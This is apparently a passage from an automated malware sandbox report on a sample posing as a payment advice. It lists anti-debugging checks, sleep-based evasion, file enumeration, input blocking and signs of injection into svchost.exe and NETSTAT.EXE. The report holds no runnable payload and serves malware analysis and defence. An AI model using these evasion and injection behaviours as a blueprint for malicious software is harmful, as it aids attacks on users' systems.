            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E rdtsc 1_2_0377096E
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeAPI coverage: 3.2 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7436Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7436Thread sleep time: -72000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe TID: 7464Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
            Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030FC510 FindFirstFileW,FindNextFileW,FindClose,6_2_030FC510
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: NETSTAT.EXE, 00000006.00000002.2958501115.000000000317E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
            Source: firefox.exe, 00000009.00000002.2689027831.0000025D1A32C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: eYlgnnKYnAjqSS.exe, 00000007.00000002.2959218476.00000000010BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E rdtsc 1_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417B93 LdrLoadDll,1_2_00417B93
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_03FA96C0 mov eax, dword ptr fs:[00000030h]0_2_03FA96C0
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_03FAAD50 mov eax, dword ptr fs:[00000030h]0_2_03FAAD50
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_03FAACF0 mov eax, dword ptr fs:[00000030h]0_2_03FAACF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D437C mov eax, dword ptr fs:[00000030h]1_2_037D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov ecx, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA352 mov eax, dword ptr fs:[00000030h]1_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8350 mov ecx, dword ptr fs:[00000030h]1_2_037D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C310 mov ecx, dword ptr fs:[00000030h]1_2_0372C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750310 mov ecx, dword ptr fs:[00000030h]1_2_03750310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037663FF mov eax, dword ptr fs:[00000030h]1_2_037663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov ecx, dword ptr fs:[00000030h]1_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]1_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]1_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC3CD mov eax, dword ptr fs:[00000030h]1_2_037EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B63C0 mov eax, dword ptr fs:[00000030h]1_2_037B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]1_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]1_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372826B mov eax, dword ptr fs:[00000030h]1_2_0372826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A250 mov eax, dword ptr fs:[00000030h]1_2_0372A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736259 mov eax, dword ptr fs:[00000030h]1_2_03736259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]1_2_037EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]1_2_037EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B8243 mov eax, dword ptr fs:[00000030h]1_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B8243 mov ecx, dword ptr fs:[00000030h]1_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372823B mov eax, dword ptr fs:[00000030h]1_2_0372823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]1_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]1_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov ecx, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]1_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]1_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C156 mov eax, dword ptr fs:[00000030h]1_2_0372C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C8158 mov eax, dword ptr fs:[00000030h]1_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]1_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]1_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov ecx, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760124 mov eax, dword ptr fs:[00000030h]1_2_03760124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov ecx, dword ptr fs:[00000030h]1_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038061E5 mov eax, dword ptr fs:[00000030h]1_2_038061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F0115 mov eax, dword ptr fs:[00000030h]1_2_037F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037601F8 mov eax, dword ptr fs:[00000030h]1_2_037601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]1_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]1_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03770185 mov eax, dword ptr fs:[00000030h]1_2_03770185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]1_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]1_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]1_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]1_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375C073 mov eax, dword ptr fs:[00000030h]1_2_0375C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732050 mov eax, dword ptr fs:[00000030h]1_2_03732050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6050 mov eax, dword ptr fs:[00000030h]1_2_037B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6030 mov eax, dword ptr fs:[00000030h]1_2_037C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A020 mov eax, dword ptr fs:[00000030h]1_2_0372A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C020 mov eax, dword ptr fs:[00000030h]1_2_0372C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4000 mov ecx, dword ptr fs:[00000030h]1_2_037B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
